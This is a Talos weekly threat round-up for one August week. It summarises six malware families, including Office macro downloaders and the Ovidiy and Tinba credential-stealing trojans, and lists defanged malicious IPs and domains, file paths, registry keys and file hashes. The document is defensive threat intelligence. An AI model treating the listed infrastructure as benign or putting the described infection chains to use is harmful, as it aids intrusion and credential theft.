Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 11 and August 18. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.
This week's most prevalent threats are:
- Doc.Downloader.Agent-6335676-0
Office Macro Downloader
This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. The execution chain typically is Word -> Shell function -> CMD -> PowerShell download and execute. - Doc.Dropper.Agent-6335671-0
Office Macro Downloader
This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable. - Doc.Macro.JunkCode-6335442-0
Office Macro
Malicious Office Macros are obfuscated to prevent easy analysis. At times this results in no-operation like instructions. These no-operation (junk) instructions create artifacts that can be detected. - Win.Trojan.Expiro-6335658-0
Trojan
This sample is a Trojan. It complicates the automated analysis and the manual debugging by using anti-debug techniques. The sample needs a proper installation of the sandbox in order to run. - Win.Trojan.Ovidiy-6333880-0
Trojan
Ovidiy, or Ovidiy Stealer, is a Windows trojan that is still under active development. It serves as a credential stealer. Although modular in nature, it mostly targets credentials from web browser sessions. It does include some C2 functionality & will beacon out with select host information. The trojan itself is written in a .NET language & discovered samples are commonly protected with several packers specifically tailored to .NET binaries. - Win.Trojan.Tinba-6333828-1
Trojan
Tinba is a tiny banking trojan primarily focused on stealing sensitive information from its victims via javascript injected into web browsers. The source code for Tinba was leaked in 2014, making it very easy for malware developers to adopt and modify its functionality.
Threats
Doc.Downloader.Agent-6335676-0
Indicators of Compromise
Registry Keys
- N/A Mutexes
- N/A IP Addresses
- 78[.]47[.]139[.]102
- 193[.]227[.]248[.]241
- 104[.]160[.]185[.]215 Domain Names
- campusassas[.]com
- campuslinne[.]com Files and or directories created
- %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\qdvjnh.bat
- %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\plzea.exe File Hashes
- 7ffabe10f4147ce48fc9ae40cdc7778d08ac7881b779743720e2c4313592445b
- c2a3dcd915905c09026044e8da533455a2742196e4294cfffc000c048c1ea9cc
- f756ea3c00d7a3dc3ff1c0224add01e8189375a64fbcd5c97f551d64c80cbdba
Coverage
Screenshots of DetectionAMP
ThreatGrid
Umbrella
Screenshot
Doc.Dropper.Agent-6335671-0
Indicators of Compromise
Registry Keys
- N/A Mutexes
- N/A IP Addresses
- N/A Domain Names
- iesimpianti[.]it
- janssen-st[.]de Files and or directories created
- %TEMP%\7E94\3F4A.bat
- %AppData%\Microsoft\Office\Recent\270700481.doc.LNK
- %AppData%\Microsoft\Office\Recent\fatt.348.LNK
- \Users\Administrator\Documents\20170810\PowerShell_transcript.PC.PbSYjzuP.20170810091133.txt
- %SystemDrive%\~$0700481.doc
- %AppData%\Microsoft\CHxRthlp\api-pntw.exe
- \TEMP\~$tt.348.doc
- %TEMP%\33513.exe
- %TEMP%\7E94\3F4A.tmp
- \TEMP\fatt.348.doc File Hashes
- 5edbc08d4e919f7186aa2b8a6e3d49ef38035c2a55b6e226910fcc60fe26a335
- bbe5988f2470a296186ca43a76636fceb523b45273a32e83aa14a8cc1f4e3a8e
- acdae0dde63863e8be98935254c901439b5fc36fb45f974fd7ce7c298e3ca0ca
- b05c34ffdc8c82862b408a1f628b21bb08362de4340d768a08c511132ce7d34d
- cad134945e7f20e99efed18650d4a7c573f8902b32c10ae89639518f94e646d0
- 0752a00c66125520f78673e70af10123cb5b78fe4786d368f7beb586d5ce3531
- ffc6c04d292e6618826bb09c8c63a06af3993e7b6b14171c45c7b44619b4421a
- 758a4e1ea1fc0c9846d21f643013fd934fd23b187ca1fd32c90334ff48a60372
- 4111dc9ca29508aa89caf873ac9359ad579270c3b3025ab0ba8098dea9c3c459
- 0524147db311dedc4631e0749bb79865ac673763bd5ebc576855fcb9431de98b
- 0e5240bf70e304781511de29a000c308f675d6209735c118cd0054b519eaa096
- 09f89667dbbd0f72478f317aed5196f743693190aa3afe1f1cfccc67dad88fb6
- 4cf480e7bab22fdd7d64c43d8f18c3c5358c25fbd063bc2d2855885b886718ac
- 6ea7a564a6a7ba8f4c97e2eaefbedafab6dd1424d56716f1255b03f8b5879161
- 3728cecd2be075b09a3a6d8d8c5923fe14cf381e3070266cf05fa51585def305
- bec41e3e8d3093b58170d743ca905af81ed745a4828a42a9d39cd3373252a84d
- bd7ed9514afabc723da282f32ad1dcfe81796a83555b7b4a6738dd0254c06ccd
- 4b495c54056aa68e91fd481168a7ddc5d5a6cae713ab359777340f1ba901ae65
- b588aa1d5901e2ded7dfc9fe8efbd13304f2bed37086b5c9aa498fdffaed48ba
- 717f927b9c0b01a60eb94254d39ac5eeee24a2c10d0c59266252630202a36323
- 056bce922fab367aabfd43f5e85bb5397755db08afcc8c38d992ffb4fe8f766f
- 3ca148e6d17868544170351c7e0dbef38e58de9435a2f33fe174c83ea9a5a7f5
- 6250f069e1268801cb3afaee2523df1aca628fa791a666f1d05b6cb981913461
- 1496ddfb94f11120267fe9d6bf233ba4726754bebf3075340496a144777a6539
- 5f1827ab138eb25289a1a76910f5dc9c96aed87dd8aa2db7e3b0d310267a5a67
- d08c719c8ea6e5d7546e6449e6aed748ce74359e7c0dbd1f9bd08e2e8b795c68
- 168c49c8207019008bdf746d0fa4ab33a154277c5fe50fd4900e9d77ec6a2e7d
- e92710c582f71c4a9cb127774fa4cce0d8abb837a38d50d22d17ef7061646c92
- f20256df607a29ef83bd035ee27fc424307712e59298f54803150a88ea5c5ece
- 190cda0ade0c0348786652b7ee12fde595e12ab561d893224cfdafbd58ec7b75
- cccb32f7f0408b32f3ad7f5a75adf1b955ba83a712e59c64f16b07713a6b44b8
- 31b34ac21405f6450bef3c18249e83a7bc464dea5cd4fb239becfe0a800875a2
- db8ee4755c2b30756abb68e14e30b7c10d283b2f989fc7f3556f92389a2c32b9
- d26ebbc2bdf6a6b59d805f7f1e9a9b505b6ff6e8b99e254f9c5c36413142d3f8
- f2fbac0942b08720073373536520b471229c918474cabb63fd19c3d006caaa1b
- 366f1f331e940a462447e2b4abe9196ae7b977d281c2b9fe5e19bb0c2927b705
- 9859e621b4d259798b2813377f9cd1736497f51cb501c6b3ea44ccae57d4e4fa
- 94395a2b7bd0a120b55e39b3107f934f9b76faa9e2679dbae1237f69f2c3f1b9
- 5df3016ba1cfd870d1d72e75ab9ec1d0a08a7e11d9fe7ec6b32fa0ce468206e7
- 5624e26cace481fa4144f5ccd5bdcc7b5c3d42c035c88250312833041cf55807
- b0610f20ce7be29f5864a02d72bcfa54e215d3159bf381d05fac58d2fa703f0d
- 1c364ed502fa3710d9fa3c5a4a2ac6688bea3610acee2a6f958220d8ffca908b
- 36472a674c751c65c15cbaab276c0fba8f3f1709750473b24e5d3c21e468617f
- 0419cd8e5884e2918c5f0746d54efe2e2d9f0385523ecdbc395200df4004d87a
- 29a7f99f81dd37bcbd196d635837c01d2aa48045ce4efd999a6d0da92bfbe917
- 6451b45a4f8bdccdbce6bcd14e5fda1f976c81efed2c4dfd028386cce31250d1
- 7a703a5e7f30a1621e204669ffefe91f22a1619814c4ef40872cd750cffb9125
- 5de158f2b9e0039b76588fd190565bcf4e02398ec8bff57d1c55bcc1626de5f3
- f8913513ec19ea386cb812e5e7249d44a4e4a3092fbfcea23fce692d7ed88970
- 6dc6070451995a7dae4d5b741e291ce525aec2cf3144d9fdb8484f39079ef9e2
- 4808a9fc9a33cf5df06d5a56f85b6e2dfdb8fc5fbb4cbd2ede05488dd566f6f5
- eb99cecc433a5134414024c98c227f52bae7660343a36469ccf0e6a8f5af4a6d
- b3dc9a164f1548ca0fd4618dbaae44c6a9ea05f66aafcf67758d9985b1409cb0
- e14472604877ad85c119703225fb6086053bcaa2ebae60d38762bbdd192e2244
- e631b1dd070f71e53dd7b5c36a1921c027257f0c79bc7964551f27d0f4ece78b
- e342cae3c710674f0e73ea2ed1e72085d790a653e249e1b5e4d8e6696e110041
- 9f404502e944f4cd76b902abf67717054732528a9399e23b3d90e2825316818d
- f6c2aea9dbc12ff2dbf77637560093234465cdae03c40ee4f0afcf8365ebfab7
- b3fffd7e92a3bb920456b149717c353c8779e45a947c0e756889956c6bc48d7a
- 45112ef00b7d34a471655f3a7318fd2b69de1ade1889647839ff897c6e6f1c67
- 9d52dd2437d0408e5971598b44c5dc1e1475004241bb5928d1eaee9a9aea51e1
- 947ec2662ab377aca91f9ccb5b2a0e823ab5b814be719494c5cb8f0e7e228252
- d076c672bdb9bd3b738edb882560482bebde469d02acd1ccda11e9c9cb6feaeb
- dcfddf26b9699622bde12c6b64a78e5446172e57c5a29c3ea0267a0df85bc1e3
- 0db7513e4ec8cea44afdce2d37991f5f9cbde0bb779856c10d9ffa75bed53d0f
- b1e4e3be5dd686424763f39f8930e28044a9cda7a48d8962ba6e8978ef532fa0
- 31755c56408a13f44d620971a60342bb0170ad78217c923c518fe4b58b4da365
- 27772ef48d027d7e23e1f78d8ea86cb1bbcf4240cd59a8dc7ebc82f8a3a8b6dd
- a31cbc1ce4abaa2ba7cab9ff97e1f647c3b1264c9cb7db0e20c74d151db2634d
- c685f1c782e6b9250035f922ebc80400f2d6515e5f343a933c6c12920eb89e92
- 5dd873a5cd07c4ac6edc7bfad7c92e1111cbddab5e72de96291e2990e0ab62e0
- 8c43427b886d65c06a43f823511f0927b85dc5956dc7bd1bd16c59af548db6b8
- 2aaf7791ed0a57e48c3d363b46ba5247e78a2290549bfd7f98793e9bee4c3e55
- 9b6d3e01584f4d1238a55050c7ffad0e14299e911db8497b81529bd58afa4bc7
- d526ffe1710b4b39866bebceb3660e1386e41df17b13a6055078b0ce7db74fbe
- 425e004b3c9034aa17071b137ca1d4ae7a35dde5f588c05295e491b716125e2a
- 8c4813043fa78b4aec7ada10556ddbe06eedbc81b115e4ff08371d8ee132d645
- c7cab605153ac4718af23d87c506e46b8f62ee2bc7e7a3e6140210c0aeb83d48
- d52318c1f83d086fcb94b8ae7288f2acb85f6e441c66a3f1d09365a1018c80bd
- 44b6060a5406112556049bd3efef8d876fe335bb4aa0f0a6f7d0210184918c71
- 4e812653205426b75038ce2796be5b254b61ee02da376462f3ad1ac23d898282
- 454ed2ca7a116ad34864d4e8b232dcb50c063ffbd70f23753262aabb6b34d24e
- bf958c7ba44b9dfdcba50eeb6f7b59fe3bd2948f1ab1a7c8ee0f162b7cac3b2c
- de0e7aae207f7a7a1f242d849bb61c7f4e98d84f74b228439d296e6a46b2f812
- 712a907f98efa76de2b349c90084fbef6d40d9df32a41df98fc62e19fab5329d
- 3d081fe6a220b546af09139fda7deceb5e7f16b52fb47d15ff4e69bab9175734
- f0b670afe4781d3e8899bf742fbd613636424681f56c4388168acea84ea344af
- 976c6ce6c484aef7d0d801c2f5ee31c984136d91636656a7e5425fbc4e848029
- 37e79b45ee53bc266d3602ec2cb79762a3c6360b5c173e89da045491150dbfb1
- a4692d62273960b017d80e2b3ee9befe9b186d0609dbf4aedd1dcaf6d3aef671
- c3e6a58e8a68518ffb43ee9026508b6520016e8d7096bf94ec2d1ed5cd328d76
- e8290589cab3707f80ada754a31263e239b870dac5bdece15bf2e331cae5acf1
Coverage
Screenshots of Detection AMP
ThreatGrid
Umbrella
Screenshot
Doc.Macro.JunkCode-6335442-0
Indicators of Compromise
Registry Keys
- <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
- Value: internat.exe Mutexes
- Local\_!MSFTHISTORY!_ IP Addresses
- 52[.]173[.]193[.]166
- 185[.]206[.]144[.]152
- 190[.]107[.]177[.]115 Domain Names
- plantatulapiz[.]cl
- kalawatu[.]site Files and or directories created
- %TEMP%\CVRDF32.tmp.cvr File Hashes
- a5eb0f2e7d972b47c5016dd755bfce2e794822ef6933ff9759fd70e72b137a16
- 404987cbcc932ba68aa9abd4607ea81ba4feb167c3f333c800a56cb2620ffd9f
- 046809ff996329f2bb539128d51a0c21179ac6d117688281dd927df4b0aaf85b
- 9679b02ca07d40f2d2d84445b5683fe2c1a135ecf73886d2ed27dc387b108417
- 3a79a33855731c0066016de8baf9ef6b946b06b1ce4fda28f3c68265afa6c89a
- 3b0997b98551548002dd9cd977cd3f881f0496ab2f86ef1a90d6c7a13765366c
- 148b0ed81c95496d80778c7d3d093627a7395b76bf9b457f958201be66e8ea1f
- 9ba948417071478c1fa3fe89c46c19c56190f47f2ba141a446166eff5a71fbb4
- 1a1a48c35aee34ba91d83ae97865d75319112165ee8e7dad7cb7714ab57c40b7
- 5b1e2ebb1baa600fba198e5c233ebb431311c976ef23f5c2f2c74ff03392a824
Coverage
Screenshots of Detection AMP
ThreatGrid
Umbrella
Win.Trojan.Expiro-6335658-0
Indicators of Compromise
Registry Keys
- <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
- Value: Collection Mutexes
- N/A IP Addresses
- N/A Domain Names
- N/A Files and or directories created
- \TEMP\60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0.exe File Hashes
- 60d2422af917cb8aa58c14b8b78d4af112c9c78343da8f7aa3fbcb87be1a4de0
- 5fd134b6abe1473fd5a7f96c711a4270fbc364bc6e3b10b5b344e0a1bfb0e4d8
- 5f5e9e5952765887211883b42e508b4b14c62a1685092978f98c6619229796b5
- 5fe205ea4f5f975703e242e8079dc471a5363538535d76584e7138ed3fb67546
- 5ffa0097ebcba0e1921c6607a644e2649532ae07b1c7d6533a3cbef52ee51620
Coverage
Screenshots of Detection AMP
ThreatGrid
Win.Trojan.Ovidiy-6333880-0
Indicators of Compromise
Registry Keys
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
- Value: EnableFileTracing
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASMANCS
- Value: ConsoleTracingMask
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
- Value: EnableConsoleTracing
- <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
- Value: FileTracingMask
- <HKLM>\Software\Microsoft\WBEM\CIMOM
- <HKCU>\Software\Microsoft\SystemCertificates\My
- <HKLM>\System\CurrentControlSet\Services\EventLog\System\Schannel
- <HKLM>\Software\Microsoft\SystemCertificates\CA
- <HKLM>\Software\Microsoft\SystemCertificates\Disallowed
- <HKLM>\Software\Microsoft\SystemCertificates\TrustedPeople
- <HKLM>\Software\Microsoft\SystemCertificates\trust
- <HKLM>\Software\Microsoft\Tracing\6838bce2f6c831414df831040fc14287_RASMANCS Mutexes
- N/A IP Addresses
- 104[.]27[.]132[.]79
- 104[.]27[.]133[.]79 Domain Names
- ovidiystealer[.]ru Files and or directories created
- N/A File Hashes
- c16408967de0ca4d3a1d28530453e1c395a5166b469893f14c47fc6683033cb3
- 062bd1d88e7b5c08444de559961f68694a445bc69807f57aa4ac581c377bc432
- 22fc445798cd3481018c66b308af8545821b2f8f7f5a86133f562b362fc17a05
- 80d450ca5b01a086806855356611405b2c87b3822c0c1c38a118bca57d87c410
- 8f6939ac776dac54c2433b33386169b4d45cfea9b8eb59fef3b922d994313b71
Coverage
Screenshots of Detection AMP
ThreatGrid
Umbrella
Win.Trojan.Tinba-6333828-1
Indicators of Compromise
Registry Keys
- HKU\Software\Microsoft\Windows\CurrentVersion\Run Mutexes
- \BaseNamedObjects\5E60878D IP Addresses
- N/A Domain Names
- recdataoneveter[.]cc Files and or directories created
- %AppData%\5E60878D\bin.exe File Hashes
- 0ce6189ecd16fbf2f885a8516836c7bb9d0685f6ff2c4a3df80e236ef5d0d803
- 33fd66f4cee5bdd9f30eb2e5bd7a65367e10f55495c1122430685a8ff0d90fcc
- 51769c916a89522975cb1babb4c9c7b18f3530286c66f3d735751cbdac02a160
- 56f91537753491cd32a250428b146d7685362c762c7e8f39703b4cf6cd92c020
- 6fd80f8da071c3dc482314cbc994b22f105bce22acdad9e9bd86bae5abed53d9
- 7607a0e1be2a8f50959ef42b78edd156aa76741fdc8ee2be9d375610c0b130b2
- 7bbd6d3d6bf6e991e023395e3cb31c18b2a106eef036ad175736a17fb1099b39
- 856ed534a7c32ab7799756c33f7ee104718c89add001428a41dc57e8449167c8
- 968ff771eab9d14d1847f489f425e44532522c7b9fe7407b09d7cc594da0eb84
- e2776a037dcad9e2c752ac4f07dfae0412312ba9b1b748a48922ed572f83eb9c
Coverage
Screenshots of Detection AMP
ThreatGrid
Umbrella